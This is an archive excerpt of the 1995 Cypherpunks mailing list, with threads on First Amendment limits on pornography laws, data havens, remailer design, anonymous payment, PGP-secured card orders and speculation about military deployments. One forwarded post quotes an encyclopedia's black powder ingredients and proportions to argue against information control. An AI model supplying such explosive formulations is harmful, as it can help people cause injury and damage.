> >year old's account being operated by an oinkdroid.)
> The key word here is 'minor'. Minors have nowhere near the rights
> that adults have. Try banning the sale of pornography to demonstrated
> adults.
>
Yes, but at no time was it proved that a minor DID d/l the file only that they could. Big distinction to me. An oinkdroid did the d/l'ing by playing like the 14 year old. To me this is entrapment.

> I think you misunderstand. The First Amendment places restrictions
> upon what the States may do. The States are free to make such
> laws or NOT. Some don't. Most do.
>
The 1st. Amendment says nothing about what the states can do, only Congress.

> It's all very well and good to say such things, but this formulation
> of liberty has no reasonable basis in Constitutional Law. The
> Bill of Rights does not encode Mill's On Liberty, as much as you
> might like it to.
>
Then I suggest you read the 9th and 10th Amendments. The 9th says the states will ALWAYS get the benefit of the doubt. The 10th says the federal government will NEVER get it unless there is a Constitutional Amendment.

> Huh? Obscenity has to do with freedom of speech, not action. It's
> an exception to the First Amendment, not to some general class
> of liberties. Depictions of anal sex are typically not considered
> obscene. The act of anal sex is often made illegal, but that's an
> entirely separate issue.
It is made illegal because it is considered obscene. You seem to be skirting the issue here. And since when is speech not an act? There are a whole list of things included in the freedom of speech issue (ie freedom of the press) that clearly implies that speech is one kind of act.

>
> >Also, the whole concept of community standards is unworkable. Whose community?
> The community passing the law.
Last time I checked such cases were tried by 12 peers, this hardly qualifies as community by any definition. It is not like they take a vote of all the people in the community of voting age (which they should).
>
>
> Look, you can make general arguments about the way that you think
> that your liberty should be, but the only legal basis you have
> for claims that you have the freedom to do something is the
> Bill of Rights. I'm arguing from that basis.
>
As am I. I base each and every one of my beliefs about how this government is supposed to be run on that document and that document alone. It is not the supreme law of the land for nothing.

From pstemari at erinet.com Tue Jan 10 21:52:02 1995
From: pstemari at erinet.com (Paul J. Ste. Marie)
Date: Tue, 10 Jan 95 21:52:02 PST
Subject: Thoughts on Data Havens
Message-ID: <9501102319.AB01326@eri.erinet.com>

At 01:30 AM 1/10/95, jpb at gate.net wrote:
> ... Post a new PGP key and encrypted address block weekly to alt.data.havens,
>alt.2600, or a stegoed picture to alt.binaries.pictures.whatever. If you
>are limiting usership, perhaps an autoencrypting majordomo list. ...

Still, messages intended for the DH could be identified by the publicly known mailer address. Some sort of protocol where each message to the remailer results in a new and different encrypted send-to block being returned to the sender would seem to be required.

Avoiding traffic analysis on these messages would require you to place a new and different encrypted reply-to on each message chunk.

> ... It would also be a good idea to only allow DH
>commands to be executed if the encrypted (mandatory) control message arrived
>from another remailer account ...

I was assuming this--on the basis that the DH would not want its location known to the presumably large number of clients.

--Paul J. Ste. Marie
pstemari at well.sf.ca.us, pstemari at erinet.com

From nelson at crynwr.com Tue Jan 10 21:56:58 1995
From: nelson at crynwr.com (Russell Nelson)
Date: Tue, 10 Jan 95 21:56:58 PST
Subject: Why use plastic for remailers and DH?
In-Reply-To:
Message-ID:

   Date: Tue, 10 Jan 1995 21:54:24 -0500 (EST)
   From: Angus Patterson

   This point may have been raised before, but anyway, unless you're using a swiss-bank issued credit card for a numbered account (if that's at all possible), or a bogus name on the card, why would anybody want to use something as completely traceable as a credit card to pay for a remailer or a data haven?

Because the message you sent into the remailer isn't traceable to the message that left the remailer (isn't that the point?). Give the FBI credit for *some* brains and assume that they already know you used the remailer, because they saw mail from you enter the remailer.

--
-russ http://www.crynwr.com/crynwr/nelson.html
Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?

From nelson at crynwr.com Tue Jan 10 22:00:04 1995
From: nelson at crynwr.com (Russell Nelson)
Date: Tue, 10 Jan 95 22:00:04 PST
Subject: Suggestion for remailer operators.
Message-ID:

If you want to run a remailer fairly safely, insist that all outgoing mail be encrypted, and put an X bytes/day limit on destinations other than other remailers.

Why? Because that way you can't use it to post to Usenet (other than to annoy people a little with unreadable postings), and you can't use it to mailbomb someone, and if the recipient doesn't decrypt the message, there will be no possible offending content.

--
-russ http://www.crynwr.com/crynwr/nelson.html
Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?

From nave at abacus.dw.att.com Tue Jan 10 22:05:45 1995
From: nave at abacus.dw.att.com (Philippe Nave)
Date: Tue, 10 Jan 95 22:05:45 PST
Subject: Odd bits, minutinae...
Message-ID: <9501110606.AA21223@abacus.ewindows>

-----BEGIN PGP SIGNED MESSAGE-----

Would *I* abstract an internal communique for a bunch of net.riffraff? Surely not - you must know me better than that...

[...stuff...]

Search done for Message:

<<< BELL LABS NEWS >>>
- ----------------
>>> ENCRYPTION -- This week, Bell Labs reported development of the AT&T Information Vending Encryption System (IVES), a security system that protects commercial information services -- such as video on demand, home shopping and banking -- and electronic news and alerting services. Using chips designed by Bell Labs and VLSI Technologies, IVES works on various networks including the Internet, cable TV networks and direct satellite broadcasting. The first application of IVES is in set-top cable television boxes being built by AT&T for Cablevision Systems Corp., the nation's fifth-largest cable service provider. By employing secure cryptographic addressing, IVES will assure that only paying customers receive enhanced pay-per-view and video-on-demand services. "There have been effective attacks on most, if not all, video encryption systems, despite highly sophisticated countermeasures," said Dr. David Maher, chief scientist for AT&T Secure Communications Systems. "Hackers are dedicated and can be well funded. Incentives are rising rapidly."

[...stuff...]

Dedicated? Definitely. Well-funded? Hmmm. This item is something for your acronym-scan parsers; will IVES become interesting? (If not IVES, what of CURRIER? Whoa- it was a joke, officer - CURRIER and IVES, get it? Oh, shit.)

Search done for Message:

<<< BELL LABS IN THE NEWS >>>
- ----------------
>>> DNA -- In a bold experiment that provokes investigators to reconsider what a computer is, a researcher has used the genetic material DNA as a sort of personal computer. The experiment's designer, Dr.
Leonard Adleman, translated a difficult math problem into the language of molecular biology and solved it by carrying out a reaction in one-fiftieth of a teaspoon of solution in a test tube. Adleman, of the Univ. of Southern California in Los Angeles, used DNA to solve a problem that involved finding the shortest path linking seven cities. Molecular computers, Adleman said, are fast and efficient, and they have unheard-of storage capacities. He said molecular computers can perform more than a trillion operations per second, which makes them 1,000 times as fast as the fastest supercomputer. And they can store information in a trillionth of the space ordinary computers require. "It's a very intriguing idea," said Ron Graham, of the Bell Labs Information Sciences Division at Murray Hill. "It's more than just cute. It makes you think in a different direction." (from the Denver Post, Nov. 22, '94)

[...stuff...]

Hmmm. Have you ever been spied on by your own metabolism? ..... YOU WILL. Then again, maybe not.

FYI.

-Philippe

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLxN0uQvlW1K2YdE1AQHMGAQAu5S0T9xUPsdY8SfB0k43bE2BNL5pb1OE
FAg7qjbJ1ugZw0EPDrGFBH7sjq2GHBhyXwgBrlL5j2oAVnnGL2+3QtrcyxIEsrXA
42ME+1JaOQo5+pclCjOrxF00MDoqGdw7hMLexGyawOs7zp+RGDrhPUkMG7ennpky
8QEfrFh8yYU=
=pI4l
-----END PGP SIGNATURE-----

--
........................................................................
Philippe D. Nave, Jr. | Strong Crypto: Don't leave $HOME without it!
nave at abacus.dr.att.com |
Denver, Colorado USA | PGP public key: by arrangement.

From lmccarth at ducie.cs.umass.edu Tue Jan 10 22:42:03 1995
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Tue, 10 Jan 95 22:42:03 PST
Subject: [SILLY] Re: Spying via DNA
In-Reply-To: <9501110606.AA21223@abacus.ewindows>
Message-ID: <199501110643.BAA08356@ducie.cs.umass.edu>

Philippe Nave writes:
> Hmmm. Have you ever been spied on by your own metabolism?

My metabolism even knows what I ate for breakfast today !!
(sorry, couldn't resist)

From lmccarth at ducie.cs.umass.edu Tue Jan 10 22:52:30 1995
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Tue, 10 Jan 95 22:52:30 PST
Subject: Why use plastic for remailers and DH?
Message-ID: <199501110657.BAA06563@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Angus Patterson writes:
> why would anybody want to use something as completely traceable as a
> credit card to pay for a remailer or a data haven?

Apart from what Russ Nelson observed, safety in numbers is potentially great. If, say, 15% of the net.populace does it, then it won't be terribly interesting to know that some particular person has done it. I suppose a transition period would be helpful, in which credit card-financed bandwidth is increased with a load of low security traffic.

-L. Futplex McCarthy

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLxOAC2f7YYibNzjpAQHFxAP9EphOcjL96QDuuJQ7eFLv/I3Ci0K6NkMI
tg9bUODYUMVqHs/2dTm8YhxNgOmx90uDb9MPx+EDDrtFZDAT9AIs8GQf1OdsyPrh
Hg9PDIB4jT+JMfY3zqERePW+0Ac5TWoxQto0uQH8lRRWvNcp0R7N/sdYOwIRRTK8
o5BGm0wyJHg=
=qt2F
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxOBOyoZzwIn1bdtAQHAXAF+Jcfrh9xhfx7MlS6oK5Cfu4E96P+rOuGW
Xto/oQG7HcqAbl2adr0zyMQnfh4alDgk
=FtZw
-----END PGP SIGNATURE-----

From bdolan at use.usit.net Tue Jan 10 23:09:15 1995
From: bdolan at use.usit.net (Brad Dolan)
Date: Tue, 10 Jan 95 23:09:15 PST
Subject: Pornography, What is it?
In-Reply-To: <199501110033.SAA00514@einstein.ssz.com>
Message-ID:

The 1st says "Congress shall make no law..." and you are right, the founding fathers meant to leave the states free to do as they pleased.
However, the 14th amendment says "...No state shall make or enforce any law which shall abridge the privileges or immunities of citizens of the United States...." This has been used to enforce Bill of Rights protections against state laws. Reading my "Citizens Rule Book," provided by a friend, Brad D. On Tue, 10 Jan 1995, root wrote: > > > > You seem to have missed where I say that I don't agree with this > > line of reasoning. I tend to believe that the first amendment means > > what it says. (I.e. make no law.) But the fact of the matter is that > > the people who make the law think differently, right or wrong. > > > I understand, I just don't think most of the folks out there against porno > are interested in constitutional rights. They don't see them as relevant to > their day to day lives. You might call it a sort of cult of personality which > is using religion as the head. > > Also, the 1st Amendment says that Congress shall make no law, it doesn't say > a damn thing about the states doing it. When I read this amendment what I see > is the founding fathers saying it is up to each state to decide for themselves. > > And since Congress is placed in charge of inter-state relations it is quite > simple to reduce this to mean that States may not apply their standards to > other states because they would then be acting in the place of the federal > government. > > > >I understand what you are saying, what I am saying is the distinction is not > > >used in practice. The bbs operator in Cali. that was busted in Tennessee was > > >busted for delivering PORNOGRAPHY (not obscenity) to a minor (in short a 14 > > >year old's account being operated by a oinkdroid.) > > The key word here is 'minor'. Minors have nowhere near the rights > > that adults have. Try banning the sale of pornography to demonstrated > > adults. > > > Yes, but at no time was it proved that a minor DID d/l the file only that they > could. Big distinction to me.
A oinkdroid did the d/l'ing by playing like the > 14 year old. To me this is entrapment. > > > I think you misunderstand. The First Amendment places restrictions > > upon what the States may do. The States are free to make such > > laws or NOT. Some don't. Most do. > > > The 1st. Amendment says nothing about what the states can do, only Congress. > > > It's all very well and good to say such things, but this formulation > > of liberty has no reasonable basis in Constitutional Law. The > > Bill of Rights does not encode Mill's On Liberty, as much as you > > might like it to. > > > Then I suggest you read the 9th and 10th Amendment. The 9th says the states > will ALWAYS get the benefit of the doubt. The 10th says the federal government > will NEVER get it unless there is a Constitional Amendment. > > > Huh? Obscenity has to do with freedom of speech, not action. It's > > an exception to the First Amendment, not to some general class > > of liberties. Depictions of anal sex are typically not considered > > obscene. The act of anal sex is often made illegal, but that's an > > entirely separate issue. > It is made illegal because it is considered obscene. You seem to be skirting > the issue here. And since when is speech not an act? There are a whole list > of things included in the freedom of speech issue (ie freedom of the press) > that clearly implies that speech is one kind of act. > > > > > >Also, the whole concept of community standards is unworkable. Whose community? > > The community passing the law. > Last time I checked such cases were tried by 12 peers, this hardly qualifies as > community by any definition. It is not like they take a vote of all the people > in the community of voting age (which they should). > > > > > > Look, you can make general arguments about the way that you think > > that your liberty should be, but the only legal basis you have > > for claims that you have the freedom to do something is the > > Bill of Rights. 
I'm arguing from that basis. > > > As am I. I base each and every one of my beliefs about how this government > is supposed to be run on that document and that document alone. It is not > the supreme law of the land for nothing. > > From mccoy at io.com Tue Jan 10 23:12:17 1995 From: mccoy at io.com (Jim McCoy) Date: Tue, 10 Jan 95 23:12:17 PST Subject: Pornography, What is it? In-Reply-To: <199501110033.SAA00514@einstein.ssz.com> Message-ID: <199501110712.BAA22058@pentagon.io.com> > From: root [...] > Also, the 1st Amendment says that Congress shall make no law, it doesn't say > a damn thing about the states doing it. While in 1850 this might have been the case, you should check some of the later amendments for and update on what has happened in the last 150 years of Con Law... jim From skaplin at mirage.skypoint.com Tue Jan 10 23:17:05 1995 From: skaplin at mirage.skypoint.com (Samuel Kaplin) Date: Tue, 10 Jan 95 23:17:05 PST Subject: Storm Signals In-Reply-To: <199501101924.OAA29627@bb.hks.net> Message-ID: <4Rn4lKjqRCC3075yn@mirage.skypoint.com> In article <199501101924.OAA29627 at bb.hks.net>, you wrote: > [BEGIN PGP SIGNED MESSAGE] > [BEGIN PGP SIGNED MESSAGE] > > On a social mailing list that I'm on, two things have been noticed in > the last week: > > 1: Somebody's roommate (a Green Beret) has been called back into > 6 months of active service. He was not told where he'd > be. > > 2: GPS fine positioning has been turned off. This is only done > during times of military operations (such as the 'invasion' > of Haiti and the Iraq Massacre). It's also been highly > correlated with Pentagon pizza deliveries. > > Anybody else have any clues as to what's up? Perhaps Bosnia? -- ============================================================================== skaplin at skypoint.com | Finger skaplin at infinity.c2.org for | a listing of crypto related files PGP encrypted mail is accepted and | available on my auto-responder. preferred. | (Yes...the faqs are there!) 
| E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard Finger skaplin at mirage.skypoint.com | outside a Roman brothel. ============================================================================== A fanatic is one who can't change his mind and won't change the subject. From tcmay at netcom.com Tue Jan 10 23:46:44 1995 From: tcmay at netcom.com (Timothy C. May) Date: Tue, 10 Jan 95 23:46:44 PST Subject: Pornography, What is it? In-Reply-To: <199501110033.SAA00514@einstein.ssz.com> Message-ID: <199501110734.XAA16586@netcom20.netcom.com> root wrote: > Also, the 1st Amendment says that Congress shall make no law, it doesn't say > a damn thing about the states doing it. When I read this amendment what I see > is the founding fathers saying it is up to each state to decide for themselves. > ... > The 1st. Amendment says nothing about what the states can do, only Congress. The Amendment(s) may read "Congress shall make no law...," but the states are *not* in fact able to pass laws restricting freedom of speech, establish religions, quarter troops, and so on. Or, rather, they may go ahead and pass such laws, but the Supreme Court will generally strike them down as being "unconstitutional." See how far Utah would get in establishing Mormonism as the official state religion ("But the Constitution says _Congress_ shall make not no, and we're not the Congress, so there!"). Deviations exist, of course. The Second Amendment is in fact routinely trampled by various states and local jurisdictions, as states ban various types of guns, etc. There is hope in the gun rights community that the Supremes will someday deign to hear a case on this and so strike down these laws which clearly controvert the Constitution. I'm not a lawyer, and it's been 25 years since I was in a "civics" class, so I'm sorry to not recall the precise language by which "Congress shall make no law" also is taken to apply to Sacramento, Albany, Austin, and so forth.
--Tim May From david.lloyd-jones at canrem.com Wed Jan 11 00:22:42 1995 From: david.lloyd-jones at canrem.com (David Lloyd-Jones) Date: Wed, 11 Jan 95 00:22:42 PST Subject: January meeting with Message-ID: <60.18618.6525.0C1C8733@canrem.com> LE+> The following is a message from my lawyer, Phil Dubois. He posted it +> to alt.security.pgp, and I thought I should post it here as well. The +> message is signed with his key. +> +> --Philip Zimmermann +> LE+The aforementioned signed message from PKZ's lawyer message failed +signature check on my system, apparently because it contained a very +long text line which, somewhere along the way, was chopped into two +lines before it arrived in my mailbox. LE+The two lines as they appeared in my message (which failed signature +test) are: Well, there it is. Phil goes free. -dlj. david.lloyd-jones at canrem.com * 1st 1.11 #3818 * Gingrich, n. abbrev. : "giving to the rich". From tedwards at src.umd.edu Wed Jan 11 00:29:41 1995 From: tedwards at src.umd.edu (Thomas Grant Edwards) Date: Wed, 11 Jan 95 00:29:41 PST Subject: Pornography, What is it? In-Reply-To: <199501110734.XAA16586@netcom20.netcom.com> Message-ID: On Tue, 10 Jan 1995, Timothy C. May wrote: > The Amendment(s) may read "Congress shall make no law...," but the > states are *not* in fact able to pass laws restricting freedom of speech, > establish religions, quarter troops, and so on. Or, rather, they may > go ahead and pass such laws, but the Supreme Court will generally > strike them down as being "unconstitutional." The 14th Amendment ensures that states shall not infringe on all "privileges and immunities" of citizens of the USA. The Slaughterhouse cases created an interesting judgement that the 14th is not talking about all rights of American citizens, but only those coming directly from citizenship, thus the Supreme Court must explicitly "incorporate" parts of the Bill of Rights via the 14th Amendment to the States. 
While freedom of speech has been "incorporated," the right to trial by jury has not, and neither has the Second Amendment for either individual right to keep and bear arms or collective (state government) right to keep and bear arms. It is pretty obvious the 14th was established to limit the ability of States to infringe on the civil rights of blacks. After reading the Slaughterhouse cases, I side with the dissenting Justices and feel that it should apply to all rights mentioned in the Constitution. But that isn't the law... (This is a fairly common thread on talk.politics.guns) -Thomas From lmccarth at ducie.cs.umass.edu Wed Jan 11 00:37:59 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Wed, 11 Jan 95 00:37:59 PST Subject: Storm Signals Message-ID: <199501110842.DAA07468@bb.hks.net> Sam Kaplin writes: > Todd Masco writes: > > 1: Somebody's roommate (a Green Beret) has been called back into > > 6 months of active service. He was not told where he'd be. > > Perhaps Bosnia? I doubt it. The only sort of Bosnian engagement that might make sense would involve a fairly conspicuous effort with a large number of troops. I can't see what a few thousand Green Berets could accomplish there. Frankly, I'm quite puzzled by these signs. I can't think of any country that seems due for a quick invasion by the USG, but the increase in granularity of the GPS information suggests an operation of greater magnitude than just a strike against terrorists, drug cartels etc. Is it time for Bay of Pigs II already ? ;) -L. Futplex McCarthy --- [This message has been signed by an auto-signing service.
A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] From mccoy at io.com Wed Jan 11 01:11:56 1995 From: mccoy at io.com (Jim McCoy) Date: Wed, 11 Jan 95 01:11:56 PST Subject: Storm Signals In-Reply-To: <199501110842.DAA07468@bb.hks.net> Message-ID: <199501110911.DAA05932@pentagon.io.com> L. McCarthy writes: > Sam Kaplin writes: > > Todd Masco writes: > > > 1: Somebody's roommate (a Green Beret) has been called back into > > > 6 months of active service. He was not told where he'd be. > > Perhaps Bosnia? > > I doubt it. [...] > > Frankly, I'm quite puzzled by these signs. I can't think of any country that > seems due for a quick invasion by the USG, but the increase in granularity of > the GPS information suggests an operation of greater magnitude than just a > strike against terrorists, drug cartels etc. Military action also requires political will, and with the recent change in power in the US govt there is no way anything is going to happen for at least six months. Freshmen congressmen do not sign off on a war the first month they get into Washington unless the populace is frothing at the mouth to kill someone, and that isn't happening. Clinton does not have the political pull to get anything related to military action through Congress at this time, and he can't afford to challenge a legislature he no longer controls so any call to arms is probably not coming from the Executive branch. I also doubt he would be stupid enough to try a "Commander in Chief" action and hope that the Republicans would forget who scores the popularity points in such an activity and back him up, the legislature would crucify him with the electorate for trying a move like this.
OTOH, Green Berets are not the kind of troops used for "strike" actions. Their primary specialty is low-intensity conflict and working with indigenous armies. Given the current geopolitical situation it seems that Bosnia is the only conflict that the US population cares about at all that would call for the use of Green Berets. Then again, maybe the military is just trying to increase its readiness in the hopes that a Republican legislature will let them use their toys again... jim From skaplin at mirage.skypoint.com Wed Jan 11 01:59:51 1995 From: skaplin at mirage.skypoint.com (Samuel Kaplin) Date: Wed, 11 Jan 95 01:59:51 PST Subject: Storm Signals In-Reply-To: <199501110842.DAA07468@bb.hks.net> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article <199501110842.DAA07468 at bb.hks.net>, you wrote: > [BEGIN PGP SIGNED MESSAGE] > [BEGIN PGP SIGNED MESSAGE] > Sam Kaplin writes: > > Perhaps Bosnia? > > I doubt it. The only sort of Bosnian engagement that might make sense would > involve a fairly conspicuous effort with a large number of troops. I can't > see what a few thousand Green Berets could accomplish there. > > Frankly, I'm quite puzzled by these signs. I can't think of any country that > seems due for a quick invasion by the USG, but the increase in granularity of > the GPS information suggests an operation of greater magnitude than just a > strike against terrorists, drug cartels etc. > > Is it time for Bay of Pigs II already ? ;) Perhaps it is two unrelated events. Maybe the Russians are using GPS in their attack on Chechnya, and the administration decided "Not on our dime." The call up could possibly be related to the repatriation of the Haitian boat people or even a continued presence in Haiti. I think Aristide still needs lots of propping up. The Ton-Ton Macoutes, from Baby Doc and Papa Doc's dictatorship were the police and military of the previous one. They just vanished into the population.
It's almost the perfect guerilla force, just the thing the berets are into. This would be much more likely if the individual was of African descent. From what I have heard, prior to any military action in Haiti, we had a sizable force of Special Forces, Green Berets and other elite troops in place. Most of them were black. This was because they blended in with the populace. Perhaps the forces on the ground needed to be rotated and personnel came up short. I don't know...but if it is anything, we should find out real soon. Mandatory crypto thought...I wonder if the government has taken any steps to prevent the INTERNET from being used for C3 functions, like it was used during the gulf war by Iraq. (I know...I know...pretty weak, but the communications has to have been encrypted. :) ) Sam BTW-You always do this to me Louis...I was just going to go to bed, and boom I'm up another hour. Grrrrrrrrrrr ;) -- ============================================================================== skaplin at skypoint.com | Finger skaplin at infinity.c2.org for | a listing of crypto related files PGP encrypted mail is accepted and | available on my auto-responder. preferred. | (Yes...the faqs are there!) | E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard Finger skaplin at mirage.skypoint.com | outside a Roman brothel. ============================================================================== And Lao-tse said: Those who know don't tell; those who tell don't know.
From rah at shipwright.com Wed Jan 11 04:40:22 1995 From: rah at shipwright.com (Robert Hettinga) Date: Wed, 11 Jan 95 04:40:22 PST Subject: credit card purchases Message-ID: Saw it there. Thought you might like it here... Cheers, Bob Hettinga >From: peace at BIX.com >Date: Wed, 11 Jan 1995 00:26:50 -0500 (EST) >Original-From: peace at BIX.com >Subject: credit card purchases >To: www-buyinfo at allegra.att.com >X-Cosy-To: www-buyinfo at allegra.att.com > > PGCHARGE > >This is a call for interested parties to participate in the alpha >test of an internet ordering program that will be offered to any >customer free of charge to create orders that should be >acceptable to any commercial establishment. > >This is a Windows program designed to generate secure charge card >orders over the internet. The payment mechanism is not the >critical component for this system, that critical component is >the use, by the purchaser, of the merchant's public key, for the >protection of sensitive data, including simple correspondence. > >Two paradigms from the commercial world, EDI and email were >selected for the implementation. Email operates in a store and >forward mode that has some security advantages over web or >network layer security. That advantage comes directly from the >fixed nature of the email message itself. Once it has been >created and signed by the keyholder, it cannot successfully be >altered by any other person. It is also possible for the message >to be encrypted at the point where it is created.
Hiding the >contents of the message from anyone other than the intended >recipient. > >EDI has already achieved a great deal of acceptance in the >commercial world. This application is a natural use of the >existing ANSI X12 structures for issuing a purchase order. Any >merchant that is currently using X12 structures should be able to >purchase a single user ViaCrypt PGP license and be in business >accepting secure credit card orders over the internet. > >PGCHARGE does not add any security features by itself, but rather >facilitates security by building an EDI transaction for a >recipient selected from a PGP public keyring. This information >is then passed to PGP to be secured. PGCHARGE then waits for PGP >to complete, adds the appropriate email headers and invokes a >mailer program. > >This program can be downloaded from ftp.csn.org as >mpj/public/pgcharge.zip. Comments can be sent to peace at bix.com. > ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From asgaard at sos.sll.se Wed Jan 11 04:46:29 1995 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Wed, 11 Jan 95 04:46:29 PST Subject: TCM on BBC In-Reply-To: Message-ID: Timothy C. May wrote: > (I'll be travelling to LA on Friday, for > a television interview with the BBC on > crypto, and so will be unwired that day.) Please announce the date and time of the broadcast (if they tell you). Mats From parsons at bga.com Wed Jan 11 05:30:33 1995 From: parsons at bga.com (Brad Parsons) Date: Wed, 11 Jan 95 05:30:33 PST Subject: CBS/C.Chung Plan Hit Job on Internet? (fwd) Message-ID: ---------- Forwarded message ---------- Date: Tue, 10 Jan 95 21:02:06 PST From: Greg Bailey Subject: Re: CBS/C.Chung Plan Hit Job on Internet? Non sequitur, I think, Helen. 
The above reads like a lame lemma of the Gun Control theorem and is based on the same fallacious premises. Information is not intrinsically harmful. People are. Information and other means need not be controlled. People must control themselves. If the people in a society cannot control their temptations to do evil with whatever means are available to them, the society cannot be called civilized by any reasonable criteria. Making information available is not a crime. Blowing people up is a crime, and those who do it should pay pay pay. Any discipline worth studying gives its students the means to do good as well as evil, and at least in theory the more they know the greater their potential to act in either direction. Throughout history damn fools have tried to limit the scope of evil by limiting information. All it has demonstrated is that by doing so one can hamstring constructive activity while accomplishing nearly zero against evil due to its tenacity. It is my opinion that the most evil thing anyone can advocate is the limiting of information, especially since in many cases those who propose to do the limiting do not even faintly understand the info themselves. It is also my opinion that to resist any efforts to limit availability of information is *not* to bury one's head under the sand. Not at all. All the theory aside, any elementary school kid who pays attention and knows how to read can easily acquire the art of making gunpowder. At least this was true in the fifties when I was at that age, and being boys my friends and I of course spent many a happy hour out in secluded fields blowing things up in various ways. This sort of thing is basic information that anyone brighter than a rock can come by. Connie Chung displays an astounding level of ignorance by suggesting that high technology has much of anything to do with the phenomenon she reports upon. 
Instead she should be asking why kids now feel they should blow up people and property instead of old castaway junk. *That* is the story, not the Internet, not Encyclopaedia Britannica ... quoting from this year's edition, by the way, from our kids' book case: gunpowder ... The first such mixture was black powder, which consists of a mixture of saltpetre (potassium nitrate), sulfur, and charcoal. When prepared in roughly the correct proportions (75 percent saltpetre, 14 percent charcoal, and 11 percent sulfur), it burns rapidly when ignited and produces ... Because the burning of black powder is a surface phenomenon, a fine granulation burns faster than a coarse one ... [more straightforward practical information follows] I wonder if Connie reads the encyclopedia. I wonder if she even has one? Grins... Greg Bailey | ATHENA Programming, Inc | 503-621-3215 | ---------------- | 24680 NW Dixie Mtn Road | fax 621-3954 | greg at minerva.com | Hillsboro, OR 97124 US | From an158409 at anon.penet.fi Wed Jan 11 06:33:03 1995 From: an158409 at anon.penet.fi (beacher) Date: Wed, 11 Jan 95 06:33:03 PST Subject: privacy digest Message-ID: <9501111321.AA25946@anon.penet.fi> I am extremely sympathetic to the anti-abortion cause but the kind of abuse described in this item is unnerving. Although illegal and reprehensible, it is one thing for a government official, because of some strong conviction, to violate the law. It is completely another to violate it for money. Men, if they were men, who did this should have their privacies cut off. Subject: Computer Privacy Digest V6#003 Computer Privacy Digest Sat, 07 Jan 95 Volume 6 : Issue: 003 ------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. Due to the double-blind, any mail replies to this message will be anonymized, and an anonymous id will be allocated automatically. You have been warned. 
Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From corbet at stout.atd.ucar.edu Wed Jan 11 07:34:33 1995 From: corbet at stout.atd.ucar.edu (Jonathan Corbet) Date: Wed, 11 Jan 95 07:34:33 PST Subject: MBONE broadcasts next week Message-ID: <199501111534.IAA23174@atd.atd.ucar.EDU> The USENIX folks plan to broadcast (well..err...multicast) a number of talks from next week's conference over the MBONE. Details are still unavailable, but Evi has posted the following interesting list of folks: ---- Wednesday, January 18: Bruce Schneier, Counterpane Systems Cryptography Brad Chen, Harvard Univ Operating System Measurement Thursday, January 19: John Ousterhout, Sun Microsystems TCL for Internet Agents Bill Janssen, Xerox PARC ILU/CORBA Inter-Language Unification Nathaniel Borenstein, 1st Virtual Holdings Internet Information Commerce David Chaum, Digicash b.v. Cash on the Internet Friday, January 20: Hal Varian, Univ of Michigan Economics of the Internet Pavel Curtis, Xerox PARC The Internet at the Turn of the Millennium: How You'll Use It and Who You'll Meet There ---- The keynote will be Mark Weiser of Xerox PARC talking about their "ubiquitious computing" scheme, which has its own set of privacy implications... Details as I get them. 
jon Jonathan Corbet National Center for Atmospheric Research, Atmospheric Technology Division corbet at stout.atd.ucar.edu http://www.atd.ucar.edu/rdp/jmc.html From unicorn at access.digex.net Wed Jan 11 08:43:59 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Wed, 11 Jan 95 08:43:59 PST Subject: Anonymous payment scheme In-Reply-To: Message-ID: On Sun, 8 Jan 1995, Samuel Kaplin wrote: > Date: Sun, 08 Jan 1995 20:20:18 -0600 > From: Samuel Kaplin > To: Eric Hughes , cypherpunks at toad.com > Subject: Re: Anonymous payment scheme > > -----BEGIN PGP SIGNED MESSAGE----- > > In article <199501021344.FAA11566 at largo.remailer.net>, you wrote: > > From: skaplin at skypoint.com (Samuel Kaplin) > > > > I was looking at at the bigger picture. Any merchant who accepts Visa or MC > > could now accept anonymous payments. No hassle at all on their part. > > [...] > > The key > > would be not to have the card attached to the account. If the card is > > attached to any type of account, then there are reporting requirements. > > > > Visa was talking about an electronic traveller's check, which, from > > what I could tell, instantiated an account in the sum of the value of > > the card purchased, which was then drawn down by purchase. The card, > > evidently, had no embossing on it. Personalization was limited to > > some account id which would last the lifetime of the balance and then > > disappear. > > This is EXACTLY what I was contemplating. I really wish they would > implement it. Then I can get the traveler's cheques out of my wallet. > (unsigned in both spots of, course.) Is this not essentially the same as the current pre-paid long distance Phone cards on the market? One would think the transition as easy for the credit card companies to make with a secured, disposable visa card. 
